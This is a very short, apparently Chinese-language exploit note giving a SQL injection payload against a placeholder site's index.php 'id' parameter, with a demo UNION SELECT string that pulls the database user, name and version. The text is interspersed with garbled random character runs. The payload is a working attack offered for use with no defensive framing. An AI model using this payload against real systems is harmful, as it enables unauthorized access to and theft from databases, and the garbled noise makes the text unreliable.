利用方法:, L! N9 ?) e: [ U0 ~
http://www.xxx.com/index.php?id=[SQL]
6 @" w3 N7 ]( j- r" \- C( n Demo:& ^ r% u7 D8 o0 E: }
http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |